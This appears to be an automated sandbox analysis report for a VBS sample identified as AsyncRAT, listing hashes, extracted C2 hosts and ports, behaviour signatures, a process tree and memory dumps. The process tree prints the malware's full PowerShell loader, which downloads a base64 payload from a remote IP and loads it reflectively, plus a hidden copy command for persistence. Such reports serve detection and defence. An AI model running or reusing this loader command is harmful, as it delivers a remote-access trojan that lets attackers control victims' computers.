asyncrat | 7fbc145717d92d4d062cee79cef674462553dfe681333bba48ccd32beb97260b

Resubmissions

14-10-2022 18:23

221014-w1l8eseae8 10

14-10-2022 18:13

221014-wt3ltsead3 10

Analysis

max time kernel
50s
max time network
151s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
14-10-2022 18:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

QJSXA02HNVFDSA_002.vbs
Size

655KB
MD5

b4b5d6de250942a76ddee880ee1e79e3
SHA1

cb510fa59d7ffe89105fccd06b987c69fc1b1481
SHA256

7fbc145717d92d4d062cee79cef674462553dfe681333bba48ccd32beb97260b
SHA512

044ed3b0da150486bd45b8484bba90ef094a2ed0ea49162115b59ad5f529633d9f277c9021882d72e2cf672e64afcaad28810170959a0c5490e5c48e97e70a6d
SSDEEP

768:K1TsI0Sed5dQRXaPlSWPk/LCFeu2ka+VLG0:ugZ2Jcy0

Score

10^/10

asyncrat default rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

hallmoney927.duckdns.org:6739

hallmoney927.duckdns.org:7301

hallmoney927.duckdns.org:7808

hallmoney927.duckdns.org:8333

hallmoney927.duckdns.org:6112

hallmoney927.duckdns.org:7553

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/1312-157-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/1312-158-0x000000000040C76E-mapping.dmp	asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

1 2336 powershell.exe
3 2336 powershell.exe
Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2336 set thread context of 1312 2336 powershell.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

2336 powershell.exe
2336 powershell.exe
2336 powershell.exe
1376 powershell.exe
1376 powershell.exe
1376 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exeRegAsm.exe

description pid process

Token: SeDebugPrivilege 2336 powershell.exe
Token: SeDebugPrivilege 1376 powershell.exe
Token: SeDebugPrivilege 1312 RegAsm.exe

flow	pid	process
1	2336	powershell.exe
3	2336	powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk	powershell.exe

description	pid	process	target process
PID 2336 set thread context of 1312	2336	powershell.exe	RegAsm.exe

pid	process
2336	powershell.exe
2336	powershell.exe
2336	powershell.exe
1376	powershell.exe
1376	powershell.exe
1376	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	1376	powershell.exe
Token: SeDebugPrivilege	1312	RegAsm.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 2744 wrote to memory of 2336	2744	WScript.exe	powershell.exe
PID 2744 wrote to memory of 2336	2744	WScript.exe	powershell.exe
PID 2336 wrote to memory of 1376	2336	powershell.exe	powershell.exe
PID 2336 wrote to memory of 1376	2336	powershell.exe	powershell.exe
PID 2336 wrote to memory of 1312	2336	powershell.exe	RegAsm.exe
PID 2336 wrote to memory of 1312	2336	powershell.exe	RegAsm.exe
PID 2336 wrote to memory of 1312	2336	powershell.exe	RegAsm.exe
PID 2336 wrote to memory of 1312	2336	powershell.exe	RegAsm.exe
PID 2336 wrote to memory of 1312	2336	powershell.exe	RegAsm.exe
PID 2336 wrote to memory of 1312	2336	powershell.exe	RegAsm.exe
PID 2336 wrote to memory of 1312	2336	powershell.exe	RegAsm.exe
PID 2336 wrote to memory of 1312	2336	powershell.exe	RegAsm.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\QJSXA02HNVFDSA_002.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('45989365f051-b5b8-e7d4-56eb-42259d7a=nekot&aidem=tla?txt.nysabjK/o/moc.topsppa.0a7e4-32r/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2336

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
f6c90ab0db80c6c3ea92556fda7273c7

SHA1
01d3866b1887cbb0abe9701f6b49c5dbc66a7dfa

SHA256
a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269

SHA512
aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
199ae40a1bb923cc2427230ef3405c07

SHA1
03ded52f8c0ec57875102638d9f8c34a130397b9

SHA256
4649aedb84b6d5abb2574c1a7833940198dae0f2707ce7ac80a1c18313303e82

SHA512
d89e68204ca74a6a141de82a8d98080ce1e07b5ad56db80f45e9d9b07afba3bf45dee67d2850f2074501e9949a57be59249d2551e2992c03ef338cb7683eb07f

Download Submit
memory/1312-194-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-212-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-157-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1312-245-0x0000000006240000-0x00000000062A6000-memory.dmp

Filesize
408KB

Download
memory/1312-158-0x000000000040C76E-mapping.dmp

Download
memory/1312-163-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-164-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-165-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-166-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-167-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-168-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-169-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-170-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-171-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-172-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-173-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-174-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-175-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-176-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-177-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-178-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-179-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-180-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-181-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-182-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-183-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-184-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-185-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-186-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-187-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-188-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-189-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-190-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-191-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-192-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-193-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-195-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-244-0x0000000006740000-0x0000000006C3E000-memory.dmp

Filesize
5.0MB

Download
memory/1312-160-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-197-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-198-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-199-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-200-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-201-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-202-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-203-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-204-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-205-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-206-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-207-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-208-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-209-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-210-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-211-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-196-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-213-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-214-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-215-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-216-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-217-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-218-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-219-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-220-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-221-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-222-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-223-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-224-0x0000000076F80000-0x000000007710E000-memory.dmp

Filesize
1.6MB

Download
memory/1312-243-0x00000000061A0000-0x000000000623C000-memory.dmp

Filesize
624KB

Download
memory/1376-141-0x0000000000000000-mapping.dmp

Download
memory/2336-126-0x000001CD1F670000-0x000001CD1F692000-memory.dmp

Filesize
136KB

Download
memory/2336-120-0x0000000000000000-mapping.dmp

Download
memory/2336-129-0x000001CD38740000-0x000001CD387B6000-memory.dmp

Filesize
472KB

Download
memory/2336-136-0x000001CD1F6B0000-0x000001CD1F6BC000-memory.dmp

Filesize
48KB

Download
memory/2336-156-0x000001CD38900000-0x000001CD38908000-memory.dmp

Filesize
32KB

Download